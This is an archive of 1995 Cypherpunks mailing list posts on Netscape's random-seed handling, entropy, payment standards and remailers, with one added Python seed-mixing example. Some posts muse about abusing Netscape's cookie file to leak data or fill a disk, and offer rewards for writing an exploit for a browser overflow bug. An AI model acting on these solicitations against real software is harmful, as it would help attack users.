# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Tue Sep 26 12:41:15 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 26 Sep 95 12:41:15 PDT
Subject: Security Update news release
Message-ID: <199509261941.MAA02266@ix6.ix.netcom.com>

>>Do the new versions use PGP's randseed.bin? If Netscape even only looks at
>>data used to keep PGP secure, Netscape will be banned from my computer
>>and every computer I am responsible for. -- For good.
>
>This is the second person who has expressed this sentiment. I don't
>understand it. If you believe that the possibility of randseed.bin
>getting out is dangerous, then why do you leave it online? Do you
>really trust every piece of software you run, every piece of software
>that can possibly access your machine over the net, to not look at
>that file?

It makes a little bit of sense - I'm not aware of any software, other than PGP and now Netscape, that _explicitly_ goes after randseed.bin, though of course just about anything can try. Assuming the code is inspectable (which it currently is), if I can see that all it's going to do with the file is crunch it into MD5 along with a bunch of other stuff, I'm not too worried, even though it is stealing slack (entropy) from PGP.

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From hallam at w3.org Tue Sep 26 12:41:58 1995
From: hallam at w3.org (Phillip M. Hallam-Baker)
Date: Tue, 26 Sep 95 12:41:58 PDT
Subject: First Payments WG Meeting Announcement
Message-ID: <9509261941.AA17884@www18.w3.org>

The World Wide Web Consortium is holding a Workshop on payments. The workshop is intended to be a small, technically oriented meeting of its payments working group.
Although it is a members only event I am willing to listen to special pleading, alternatively companies may wish to join the consortium at our extremely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for details.

--
Phillip M. Hallam-Baker Not speaking for anyone else
hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!

ANNOUNCE: First W3C Payments WG Meeting, October 11
----------------------------------------------------------------------------
What: 1st W3C Payment WG Meeting
Where: MIT EECS, Grier Room 34-401 (subject to change)
When: Wednesday October 11, 9am - 5pm
Who: W3C Member Representatives ONLY
URL: First W3C Payments WG Meeting

W3C is making progress on supporting electronic payments on the web. This WG Meeting has been called to foster discussion and feedback between W3C and its members. Discussion will focus on proposals to the W3C for payment protocols, interfaces, and e-commerce support.

The agenda for the electronic payment workshop is still being settled. At the current time we have confirmed presentations by VISA, IBM, W3C, and the Financial Services Technical Consortium (FSTC). Additional invitations have been issued, and suggestions for additional presentations would be welcome. Contact Phillip Hallam-Baker (hallam at w3.org) or Jim Miller (JMiller at w3.org) with suggestions.

There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th. Contact Rohit Khare for details (khare at w3.org)

To RSVP for the Payments WG Meeting, email the coordinator, Phillip Hallam-Baker (hallam at w3.org) or call 617/258-5967 by 5 October. This workshop is aimed at technologists; please include a brief description of any relevant payments work you or your organization are involved in.

This is a preliminary announcement of the date and time only. We have arranged for hotel rooms at the Kendall Square Marriott.
To qualify for the MIT discount, notify Susan Hardy (susan at w3.org). For a review of the Consortium's plans, see W3C's report on Electronic Payment Schemes and the Third W3C Security Workshop.

From vince at offshore.com.ai Tue Sep 26 12:42:27 1995
From: vince at offshore.com.ai (Vincent Cate)
Date: Tue, 26 Sep 95 12:42:27 PDT
Subject: real randomness for netscape - user clicking mouse
In-Reply-To: <199509250402.OAA17312@sweeney.cs.monash.edu.au>
Message-ID:

While it is true that on some versions of X you can watch mouse events on other people's computers, it is also true that on some versions you can watch keyboard input. At CMU Bennet Yee wrote a program to get people's passwords as they typed them in using X's poor/non-existent security back then. This was before xauth.

I still think that the low bits of the mouse's X and Y positions as the user moves the mouse around the screen are a very good source of random bits for Netscape.

-- Vince

From andrew_loewenstern at il.us.swissbank.com Tue Sep 26 12:56:19 1995
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Tue, 26 Sep 95 12:56:19 PDT
Subject: getting netscape to support the remailers
Message-ID: <9509261951.AA01873@ch1d157nwk>

> I started thinking about what it would take to get Netscape
> to support sending mail through the remailers, after having
> read the S/MIME specs which Netscape 2.0 is apparently going to
> support. Perhaps with enough browbeating Netscape 3.0 will support
> the remailers.

Netscape doesn't need to support remailers explicitly since Netscape will be supporting Java. I think a remailer client is within Java's capabilities... Anyone disagree?
andrew

From alano at teleport.com Tue Sep 26 12:59:40 1995
From: alano at teleport.com (Alan Olsen)
Date: Tue, 26 Sep 95 12:59:40 PDT
Subject: [NOISE] Re: Easter Eggs
Message-ID: <199509261959.MAA28501@desiree.teleport.com>

At 10:21 AM 9/26/95 -0400, you wrote:
>I also think that in Netscape their existence is an
>indication that the management at Netscape is a bit less uptight than
>management at some other places.

Depends on the department. They have at least one manager at Netscape with a permanent case of high blood pressure. (He happens to be in charge of the support department.)

>I didn't know about the FishCam Easter Egg, but I know that Netscape
>has a couple of Easter Eggs related to the activity indicator in the
>top right of the display. Typically this is the Big N logo with
>animated meteors, etc. flying by when the window is active. One
>Easter Egg temporarily turns this into a compass which spins to
>indicate activity. Another causes the animation to show a dragon
>(Mozilla) breathing fire for the remainder of the session. I won't
>spoil your fun by telling how to find them.

If he is not running X Windows, he is going to be searching a long time for the Compass easter egg. You also need X windows to find the Mozilla animated icon hack on Jamie Zawinski's page. Which easter eggs that are available is dependent on which client you are running.

obNetscapeHack: There is a feature called a "cookie file" in Netscape that is ripe for exploitation as a security leak. If you are using a Netscape server (and you may not even need that), you can feed all sorts of information into it without the user's knowledge. I have heard of one page that overloads the cookie file until the machine runs out of drive space. I am sure that there are other exploitable holes there... Any takers?

| Minister of Forced Caffinization in the DNRC | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: |
| mankind free in one-key-steganography-privacy!"
| Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|
| http://www.teleport.com/~alano | |

From sameer at c2.org Tue Sep 26 13:02:28 1995
From: sameer at c2.org (sameer)
Date: Tue, 26 Sep 95 13:02:28 PDT
Subject: getting netscape to support the remailers
In-Reply-To: <9509261951.AA01873@ch1d157nwk>
Message-ID: <199509261957.MAA20143@infinity.c2.org>

That was what I was thinking as well. I am confused by Netscape's java support though.. I haven't seen very many details. Is netscape going to only support applets or can you add stuff to the runtime as well? In order to use jcrypt one needs access to add stuff to the runtime I believe.

>
> > I started thinking about what it would take to get Netscape
> > to support sending mail through the remailers, after having
> > read the S/MIME specs which Netscape 2.0 is apparently going to
> > support. Perhaps with enough browbeating Netscape 3.0 will support
> > the remailers.
>
> Netscape doesn't need to support remailers explicitly since Netscape will be
> supporting Java. I think a remailer client is within Java's capabilities...
> Anyone disagree?
>
> andrew
>

--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From jya at pipeline.com Tue Sep 26 13:03:05 1995
From: jya at pipeline.com (John Young)
Date: Tue, 26 Sep 95 13:03:05 PDT
Subject: IBE_dam
Message-ID: <199509262002.QAA17680@pipe1.nyc.pipeline.com>

9-26-95. W$Japer:

"On-Line Service to Assist Global Trade."

A group of multinational companies is expected to unveil today an on-line service to businesses to engage in international trade. Dubbed IBEX, it is a joint effort of AT&T, Dun & Bradstreet, General Electric and the U.S. Chamber of Commerce to let businesses use on-line traffic to line up suppliers, negotiate contracts, make and receive bids, and arrange the delivery of goods and services around the world.
IBEX expects the backing of Chase Manhattan, Microsoft, DEC and Simon & Schuster. The IBEX software allows companies to sign on and submit a request for goods or services, which is posted anonymously. The request could be styled using an array of categories offered by the service, including location, product category, payment and shipping terms. The customer would then receive bids from businesses hoping to land the contract. Once a bid is chosen, the identities of the businesses are disclosed and negotiations begin. IBEX allows them to attach documents such as confidentiality agreements, contracts and purchase orders.

IBE_dam (5 kb)

From tomw at orac.engr.sgi.com Tue Sep 26 13:13:53 1995
From: tomw at orac.engr.sgi.com (Tom Weinstein)
Date: Tue, 26 Sep 95 13:13:53 PDT
Subject: Security Update news release
In-Reply-To:
Message-ID: <199509261955.MAA02671@orac.engr.sgi.com>

In article , shamrock at netcom.com (Lucky Green) writes:
> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure, Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

This is ludicrous. You couldn't compromise PGP's security even if you posted the contents of randseed.bin to the net. Its contents are carefully sanitized before it's saved to disk and before it's used.

--
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything. -- Washington DC motto | tomw at engr.sgi.com

From pays at gctech.edelweb.fr Tue Sep 26 13:40:46 1995
From: pays at gctech.edelweb.fr (Paul-Andre Pays)
Date: Tue, 26 Sep 95 13:40:46 PDT
Subject: First Payments WG Meeting Announcement
Message-ID:

At 15:41 26/09/95, Phillip M. Hallam-Baker wrote:
>The World Wide Web Consortium is holding a Workshop on payments. The workshop
>is intended to be a small, technically oriented meeting of its payments working
>group.
>Although it is a members only event I am willing to listen to special
>pleading, alternatively companies may wish to join the consortium at our
>extremely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for
>details.
>
>--
>Phillip M. Hallam-Baker Not speaking for anyone else
>hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
>Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!
>
>ANNOUNCE: First W3C Payments WG Meeting, October 11
>
>----------------------------------------------------------------------------
>
>What: 1st W3C Payment WG Meeting
>
>Where: MIT EECS, Grier Room 34-401 (subject to change)
>
>When: Wednesday October 11, 9am - 5pm
>

All that is extremely fine and an awaited initiative BUT for one point: the EXTREMELY SHORT DELAY and notification!!!!!!

Our company is just in the "joining the consortium" process, especially because we were expecting such an event. However, to be able to catch a flight and spend a couple of days at MIT within less than a fortnight is another matter. I don't yet know if we will be able to attend, and we really would hate to be unable to attend and participate.

Thus I would urge the Web Consortium to consider postponing this meeting for at least 2 or 4 weeks so that any interested party is able to decently cancel other commitments and get prepared for the meeting. If W3C is really interested in attracting all interested parties, it would be fair as I suspect we are not the only ones with

Please let me know as soon as possible if this is possible or if I must as soon as possible try to change my agenda.
regards,

-- PAP
_________________________________________________________________________
PAP: paul-andre.pays at gctech.edelWeb.fr tel: +33 1 34 52 00 88 fax: +33 1 34 52 25 26
GC Tech "The Globe Online and Globe ID Technology Company"
http://www.globeonline.fr/ http://www.gctech.fr/

From hallam at w3.org Tue Sep 26 13:46:55 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 26 Sep 95 13:46:55 PDT
Subject: Hack Microsoft?
In-Reply-To: <199509260404.AAA14297@clark.net>
Message-ID: <9509262046.AA18525@zorch.w3.org>

> Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>they approve C2.

Well yes and no, C2 is not a particularly high security rating. It is also a fairly obsolete set of requirements. So if anyone is to claim a breach of a C2 system it had better be one within the C2 assurances, not something that is only covered in the B series criteria. What really matters is the combined criteria which should have/would have emerged from NIST had the issue of harmonising the US/Canadian criteria with the European ones turned up.

As a cypherpunks aside we reviewed the orange book criteria in a reading group here at MIT a few months back. One point that was made was that Orange Book does not consider cryptographic security systems which was generally considered a disappointment.

Obviously Windows NT is "fair game" for analysis. Remember however that it is an established operating system and that there are many people who rely on it. I think that if people want to go down that route they should start by establishing contacts with CERT and Microsoft in order to make sure that people whose businesses depend on the security of their O/S are not compromised. You may well find that Microsoft is willing to give you free copies of WNT to do this type of work on.

I think that this would be a really good project.
The more independent analysis of an operating system that takes place the more confidence people can place in it. Windows NT is in many ways a descendant of VMS which has a very good security record. There is no reason why Windows NT should not mature to that level of security. It was built with security in mind after all, unlike the UNIX situation, where security was never more than an afterthought and often merely wishful thinking.

There are an awful lot of WNT seats out there already. I expect them to outnumber UNIX very soon. The only thing that is holding it back is the relatively small size of the userbase compared to windows and the resources required to run it. WNT requires similar CPU and memory to UNIX which is hardly surprising since it is doing very much the same thing.

I would suggest however that the project is structured and coordinated in some fashion. Someone should keep a list of security concerns that have been addressed and checked. That list should have some structure such as a division into the main risk categories (Authenticity, confidentiality, Service) so that people can get a feel for how thoroughly the space is being searched. Later on that list is likely to be one of the most valuable end results of such a project.

Phill

From jsimmons at goblin.punk.net Tue Sep 26 13:49:34 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Tue, 26 Sep 95 13:49:34 PDT
Subject: Netscape Stock Prices
Message-ID: <199509262045.NAA05438@goblin.punk.net>

Here's the history of Netscape's stock price to date, with the dates of some Cypherpunk exploits, the Wall Street Journal Articles about them, and major Netscape press releases.
Date     High    Low     Close   Volume
950809   75.000  53.750  55.500  3851.8
950810   56.500  51.375  51.375  2795.9
950811   53.000  48.750  51.500  1907.4
950814   51.750  50.250  51.250   530.9
950815   55.250  51.250  54.625  1040.6   Damien's Crack - AT&T deal
950816   56.500  55.250  55.625   997.6   Developer's Partnership announced
950817   55.250  52.500  54.875   562.5   WSJ article re: Damien
950818   55.250  52.250  52.625   409.5
950821   52.750  51.000  51.000   290.0
950822   51.500  50.500  50.625   258.5   Win95 Navigator released
950823   53.500  50.500  52.000   414.2
950824   52.000  51.250  51.250   119.7
950825   52.000  51.250  51.250    89.2
950826                                    Brute Crack
950828   51.750  51.000  51.000   210.2
950829   51.250  46.750  48.250  1037.9
950830   48.500  46.000  46.625   319.3
950831   49.500  45.750  49.500   423.0
950901   49.500  47.750  48.750   164.4
950905   49.250  46.000  46.250   277.8
950906   49.500  47.250  48.750   351.9
950907   50.750  48.750  50.250   499.1
950908   51.000  50.000  50.250   147.6
950911   54.750  50.250  53.250   533.7
950912   54.500  51.000  52.250   211.5
950913   52.750  50.000  50.750   150.8
950914   51.250  50.250  50.250    79.9
950915   53.750  50.250  53.250   242.1
950917                                    Ian & Dave's Crack
950918   55.250  51.750  52.500   350.1   New Software Announced
950919   53.250  49.000  53.375   373.5   WSJ article re: Ian & Dave
950920   56.250  53.250  54.750   302.5
950921   59.125  54.250  58.750   436.9   Collabra Purchase Announced
950922   63.250  59.750  62.750   807.7   Ray's overflow bug
950925   69.000  62.250  67.000   684.0   WSJ article re: overflow bug

Stock prices from MIT's stock price history server and the Wall Street Journal. Cypherpunk dates from Sameer's Hack Netscape Page (not sure when Ray posted). Press announcement dates from Netscape's home page. Any typos or mistakes from me.

--
Jeff Simmons jsimmons at goblin.punk.net

From alano at teleport.com Tue Sep 26 14:07:26 1995
From: alano at teleport.com (Alan Olsen)
Date: Tue, 26 Sep 95 14:07:26 PDT
Subject: [More NOISE] Re: Netscape for OS/2, when?
(Re: Another Netscape Bug)
Message-ID: <199509262107.OAA19327@desiree.teleport.com>

At 09:30 AM 9/26/95 EDT, Sentiono Leowinata wrote:
>I wish Netscape will port it to OS/2 (already ask them, but no comment
>from Netscape). I don't try it on Netscape 1.1N as it doesn't run
>reliably under Win-OS/2 (10 min -> crash! ;)

According to Netscape they will *NEVER* support OS/2. (They have made the statement a number of times.) They seem to think that OS/2 will never amount to much. (They may be right...)

| Minister of Forced Caffinization in the DNRC | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: |
| mankind free in one-key-steganography-privacy!" | Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|
| http://www.teleport.com/~alano | |

From jsw at netscape.com Tue Sep 26 14:33:25 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 14:33:25 PDT
Subject: Security Update news release
In-Reply-To: <9509251617.ZM167@tofuhut>
Message-ID: <9509261428.ZM150@tofuhut>

> Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> data used to keep PGP secure, Netscape will be banned from my computer
> and every computer I am responsible for. -- For good.

Rather than get into a big fight about how safe it is for netscape to be reading PGP's randseed.bin file, I've changed our code to not do it. Instead of reading ~/.pgp/randseed.bin, we now get the name of a file from the environment variable NSRANDFILE, and pass that file's contents through the RNG seed hash. If you decide that it's safe, you can set the env variable to point to your randseed.bin file, or any other file of random bits you care to use.

--Jeff

--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
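An added example, not Netscape's code and not from anyone on this thread, of the seeding scheme Jeff describes: an optional file named by NSRANDFILE is hashed into the seed together with inputs that a reader of the file never sees, which is also why, as Tom Weinstein argues earlier in the thread, publishing such a file does not hand over the seed. SHA-256 standing in for the unnamed seed hash, the 64 KB read cap, and the function names are my assumptions.

```python
"""Seed mixing from an optional user-designated file (added example)."""
import hashlib
import os
from typing import Mapping, Optional

ENV_VAR = "NSRANDFILE"            # variable name from Jeff Weinstein's message
MAX_SEED_FILE_BYTES = 64 * 1024   # assumed cap so a huge file cannot stall startup


def read_seed_file(env: Mapping[str, str]) -> Optional[bytes]:
    """Return the contents of the file named by NSRANDFILE, or None.

    None covers every way the optional input can be absent: the variable
    is unset or empty, the path does not exist, or it is unreadable.
    None is deliberately not an error; the seed simply loses one input.
    """
    path = env.get(ENV_VAR, "")
    if not path:
        return None
    try:
        with open(path, "rb") as fh:
            return fh.read(MAX_SEED_FILE_BYTES)
    except OSError:
        return None


def mix_seed(*sources: Optional[bytes]) -> bytes:
    """Hash all available sources into one 32-byte seed.

    Every source is length-prefixed before hashing, so two different splits
    of the same bytes (b"ab" + b"c" versus b"a" + b"bc") give different seeds.
    Absent (None) sources are skipped rather than hashed as empty, so the
    result is the same whether the caller passed None or omitted them.
    """
    h = hashlib.sha256()
    for src in sources:
        if src is None:
            continue
        h.update(len(src).to_bytes(8, "big"))
        h.update(src)
    return h.digest()


def build_seed(env: Mapping[str, str], private_entropy: bytes) -> bytes:
    """Seed = H(optional file || entropy the file's reader does not see).

    private_entropy stands for the other inputs the seed hash receives
    (os.urandom, timings, and so on). Because the file is only ever hashed
    together with them, knowing the file's contents does not reveal the seed.
    """
    return mix_seed(read_seed_file(env), private_entropy)


def _demo() -> None:
    # Constructed sample file; the bytes are not a real randseed.bin.
    import tempfile
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"constructed sample seed file, not a real randseed.bin")
        path = tmp.name
    try:
        print("with NSRANDFILE:   ", build_seed({ENV_VAR: path}, os.urandom(32)).hex())
        print("without NSRANDFILE:", build_seed({}, os.urandom(32)).hex())
    finally:
        os.unlink(path)


if __name__ == "__main__":
    _demo()
```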
From vznuri at netcom.com Tue Sep 26 14:45:12 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Tue, 26 Sep 95 14:45:12 PDT
Subject: cypherpunk press releases vs. FAQ
In-Reply-To:
Message-ID: <199509262141.OAA24578@netcom8.netcom.com>

earlier I advocated a press release mechanism, and this is getting flamed to smithereens by the more libertarian/cryptoanarchist elements of the group, as I predicted (but geez, accusing me of *deliberately* trying to start a flamewar here really hurts my feelings! if I were really that mischievous, the meager return would be quite an insult to my expertise.. ). however this is entirely a matter of phrasing of the question. I am *not* advocating that someone be elected the spokesman, that everyone agrees on what he says, that we all agree it is our "official representation" etc. and I thought I made this clear. (oops, I used that "we" word again, my humble apologies. just pretend that I'm talking to my tentacles if you object.)

I do believe these are valuable attributes of groups and can help knit cohesion and help determine meaningful agenda (people here sometimes complain about the lack of focus or of conquest, and do you need any clue as to *why* there is a lack of this?) but I will not promote it where it is not relevant (or at least, not welcomed).

what I had in mind was a more FAQ-like cypherpunks document, with a list of who considers themselves a cypherpunks contributor, or just someone who is willing to be a listed expert on a topic for media inquiries. all the time, someone just sits down and writes a FAQ for a newsgroup, yet there was no "official" appointment. if a FAQ is continually updated, it becomes very much like a press release. a question on the list might be, "what exactly did the cypherpunks discover about netscape? what is the seriousness of this flaw?" etc. in this way the questions become virtually identical to what the media would inquire.
and in a sense every newsgroup's FAQ is almost like a "press release" for everyone in the newsgroup. but this also shows why a FAQ is almost invariably *extremely* time consuming and a herculean task to compile/update involving huge numbers of man-hours the refined, final product does not convey.

I am advocating that individuals here come up with a FAQ. there are excellent web sites, but not a simple FAQ of this group. I also encourage competing FAQs at first. this happens all the time in newsgroups, and they eventually merge or cover different topics. the FAQ topic has been discussed here often, and everyone agrees it is a pretty good idea, and someone should "just do it" if they want to. I guess what I'm pointing out (beyond the usual noise on the subject) is that if anyone wants to have cypherpunk press releases, that energy is better channelled into a FAQ. it is a definite vacuum that would beneficially be filled, IMHO. (the TCM cyphernomicon, while admirable, is not really a FAQ imho..)

I am *not* advocating that (or rather, I say that we *should not*) vote on a FAQ writer, decide what is the *official* FAQ for the group if there are competing ones, bar or *discourage* some people from creating a FAQ, etc. what I want to point out is that the FAQ is a model by which a very anarchic group of people can come to a definite document by which they communicate their "findings" and their concerns, and everything else that occupies their brains daily. this happens through the FAQ writer as a conduit. in a sense, the FAQ writer is the unappointed "spokesman" for the group. he wins approval through the gradual process of people using the document and not through any other means.

another alternative that actually seems to be enjoying some success is for individual cypherpunks to issue press releases pertaining to their own specialty. i.e., "so-and-so at company X announced that they would be doing so-and-so in conjunction with the cypherpunks".
again, how can anyone object to this if there really is no such thing as a "cypherpunk group"? their press release certainly can't be in conflict with something that doesn't exist. the sword cuts both ways, although the rabid elements on this list would rather not admit it: if no one is a cypherpunk, if there is no "official" goal or leader, if the term is not owned by anyone, then anyone can define "cypherpunk" to be anything they want, and do anything they like under that title. as soon as you say, "well, they're not a cypherpunk if so-and-so", well, you're pretty much violating your own premise: that there is no such thing as a "cypherpunks group" or "official agenda".

it seems to me that the opposition to group organizing etc. in this group is related to something else: the idea that the most valuable conquests come from individual tinkerers who are not part of any "group", who pursue their own ideas at the ignorance or hostility of the rest of "society" (another cypherpunk 4-letter word, of course). this is related to the idea of doing things in secret, too. "the most valuable projects are those that are kept secret, pursued by only one or a few, and then unleashed on the world all at once." these are interesting and enticing ideas, and I don't deny them to some degree (there are many famous historical examples, such as arguably Tesla, Ramanujan, Fermat, Archimedes, etc.), but it is also true, IMHO, that there are certain things that cannot be accomplished without a certain degree of organization and cooperation among many elements.. (well, again a cryptoanarchist heresy, but hell, I'm pretty good at those). but fortunately a FAQ does not require the latter, although it can benefit immensely from it (the sci.crypt FAQ has a group of collaborating writers, as do many other FAQs).
--Vlad Nuri

From dvw at hamachi.epr.com Tue Sep 26 14:56:30 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Tue, 26 Sep 95 14:56:30 PDT
Subject: More on "Entropy"
Message-ID: <30687699@hamachi>

David Van Wie wrote:
>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),

Timothy C. May wrote:
>Hah! Another physicist converted to the information-theoretic view of entropy!

Indeed. I was able to track down the literature, and it is most interesting. I am still a little bit skeptical of the "superset including thermodynamic entropy" school of thought, but I haven't finished reading all of the materials yet! Clearly, the IT "version" of entropy is a well defined and useful thing....

>I should've pointed out in my reading list that several names stand out in
>this interpretation:

I'll read with that endorsement in mind. Your thoughts on rigorous, _concise_, design criteria for sources of entropy would be appreciated (unless there is good quality work in the literature I haven't come to yet).

dvw

From dvw at hamachi.epr.com Tue Sep 26 14:56:32 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Tue, 26 Sep 95 14:56:32 PDT
Subject: `Random' seed.
Message-ID: <30687693@hamachi>

Matt Blaze wrote:
>Here's my current favorite quick-and-dirty true-random-in-software generator.
>Use at own risk and read the comments carefully...
[...]
> * Physically random numbers (very nearly uniform)
> * D. P. Mitchell
> * Modified by Matt Blaze 2/95
[...]
> * WARNING: depending on the particular platform, truerand() output may
> * be biased or correlated. In general, you can expect about 16 bits of
> * "pseudo-entropy" out of each 32 bit word returned by truerand(),
> * but it may not be uniformly diffused.

While this comment provides some general information, it does not give the expected entropy in the form of testable assumptions. A first step in this direction is to provide the entropy series used to arrive at the 16 bit per 32 bit word estimate.
The second step, as I recommended last week (RE: RNG Resource FAQ... on 9/22), is to provide a concise argument drawn directly from the mathematical weaknesses of the entropy series. In that post, I posed the following four criteria because they address the mathematical (theoretical) weaknesses of the entropy series, while using a vocabulary that should be sensible to a rigorous designer:

1) The states exist and can be identified.
2) The number of states n is known.
3) The index value i uniquely identifies a state.
4) The function P_i is known and well-behaved.

In this way, an analyst can review both the entropy series itself, and a _concise_ statement of the criteria under which the series is defined (i.e. when the 4 mathematical weaknesses have been appropriately addressed), and the argument "why" has been scrutinized against the code or proposed design.

dvw

From dvw at hamachi.epr.com Tue Sep 26 14:57:20 1995
From: dvw at hamachi.epr.com (David Van Wie)
Date: Tue, 26 Sep 95 14:57:20 PDT
Subject: Netscape "random" number seed generator code available
Message-ID: <3068769F@hamachi>

Phil Karlton wrote:
>[You will be expected to show your work. :-)]

In the spirit of showing work, how about a run through your entropy series?

dvw

From eb at comsec.com Tue Sep 26 15:09:57 1995
From: eb at comsec.com (Eric Blossom)
Date: Tue, 26 Sep 95 15:09:57 PDT
Subject: Cypherpunks Lite
In-Reply-To: <9509232307.memo.6018@BIX.com>
Message-ID: <199509262133.OAA21492@comsec.com>

> Would the person who does this, or someone who can point me at him, contact
> me via e-mail please?

Hi, Eric here. I publish Cypherpunks Lite. What can I do for you? Let me know if you have any other questions.

Eric

Here's my standard blurb:
----------------
Thanks for your interest in Cypherpunks Lite. I provide a moderated version of the Cypherpunks list called "Cypherpunks Lite". A one year subscription costs US$20 and is payable by check or money order to "COMSEC Partners".
Cypherpunks Lite is available in either individual messages or a more-or-less daily message digest. The content of both are the same. In either case, I forward approximately 5 - 10% of the total Cypherpunks feed. This works out to about 5 - 10 messages / day. To take a look at what you can expect there is an archive of the previous selections organized by month at ftp://ftp.crl.com/users/co/comsec/cp-lite. The files with the extension .gz are compressed using gzip. If you would like to subscribe, please send payment to: COMSEC Partners 1275 Fourth Street, Suite 194 Santa Rosa, CA 95404 USA Be sure to provide the email address you want us to use, as well as indicating your preference for individual messages or the digest. Thanks again, Eric Blossom From an215712 at anon.penet.fi Tue Sep 26 15:21:03 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Tue, 26 Sep 95 15:21:03 PDT Subject: Banks eyeball sci-fi style identification for ATMs Message-ID: <9509262156.AA26030@anon.penet.fi> Date: Sun, 24 Sep 1995 10:20:05 PDT NEW YORK (American Banker) - Biometric identification, a process formerly seen only in futuristic movies and high-security government offices, may soon become part of the most common consumer banking transactions. Bankers' interest in biometric ID -- a sophisticated antifraud measure that exploits the fact that every human possesses unique physical characteristics -- dates back more than a decade. But until recently most banks and equipment manufacturers have watched the development of technology that recognizes fingerprints, voices, and other personal traits from a distance. That has begun to change, experts said. One of the companies leading the charge toward everyday use of biometric identification in banking is Sensar Inc., a Princeton, N.J.-based company that is developing an automated teller machine application for its patented Iriscan process. 
According to experts, the eye is one of the most unique parts of the human body and the iris biometric more reliable than virtually any other, including fingerprints and voice. Voices change over the course of a life, and fingerprints sometimes disappear on people who work with their hands. By contrast, the iris, which is the colored area of the eye, is stable throughout a lifetime. They are thoroughly unique and naturally visible. In a nutshell, the company's product, to be sold under the name Irisident, is being designed to capture an image of a consumer's eye and match it to an image on file before authorizing an ATM transaction. ``The research that's been done with consumers indicates they like the idea of having biometric verification -- it gives them a feeling of greater security,'' said Liam Carmody, a principal with the Ridgewood, N.J.-based consulting firm Carmody & Bloom. ``But they don't want intrusive verification.'' Sensar officials understand that the use of the eye as an identification tool is likely to meet with skepticism from some bankers, who wonder whether consumers will rebel against it. However, they said their ATM application -- which should be available in prototype in the next few months -- is being designed to address the consumer concerns. And they insist that Irisident products will be of practical use to bankers. ``We are operating under the assumption that the consumer is not going to put his eye up to something to be scanned,'' said Kevin McQuade, vice president of strategic business development at Sensar. ``The breakthrough here is the ability to obtain the image of the eye unintrusively,'' said Thomas Drury, president and chief executive of Sensar, which is a unit of the David Sarnoff Research Center Inc., also based in Princeton. 
Several influential companies have committed money to the development of an ATM application for Sensar's technology, including Huntington Bancshares Inc., OKI Electric Industry Ltd., and a money-center bank that does not want to be identified. Though the bankers declined to discuss their investment in the project, OKI Electric has committed a minimum of $25.8 million for development funding in return for the exclusive rights to market the products in Japan, where the Tokyo-based company is the leading vendor of ATMs. Experts said this support shows that the financial services industry is looking for alternatives to the personal identification numbers and computer passwords that have been compromised with increasing frequency in recent years. The choices are many, and include fingerprints, on-line signature verification, and even the measurement of facial thermal zones. ``Bankers are interested in alternatives to the PIN,'' said V. John Stroia, a marketing manager with Diebold, Canton, Ohio. Diebold and IBM operate an ATM joint venture known as InterBold. ``The major barrier is not so much the technology as getting the customer acclimated to'' using biometric technologies. But, he added, capturing sensitive biometric data -- such as that from the eye or face -- ``is going to have to be covertly done.'' ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. 
From jsw at neon.netscape.com Tue Sep 26 15:22:07 1995
From: jsw at neon.netscape.com (Jeff Weinstein)
Date: Tue, 26 Sep 95 15:22:07 PDT
Subject: WSJ on Netscape Hole 3
In-Reply-To:
Message-ID: <449ucq$f5d@tera.mcom.com>

In article <199509252300.QAA29812 at infinity.c2.org>, sameer at c2.org (sameer) writes:
> He's -asking- for an exploit. Tshirts to Ray and the person who
> does the exploit, if it gets written. Maybe I should just ring up 8lgm and
> have them do one.
>
> > On Mon, 25 Sep 1995, John Young wrote:
> >
> > > The Wall Street Journal, September 25, 1995, p. B12.
> > >
> > > Marc Andreessen, vice president of technology at Netscape,
> > > said the company will issue fixes for the recent glitches
> > > later this week. He added that it's unclear whether
> > > anything other than temporarily crashing a user's computer
> > > could result from the recent flaw.
> >
> > Oh Marc, you didn't really want to say that, did you?
> >
> > -Thomas
>

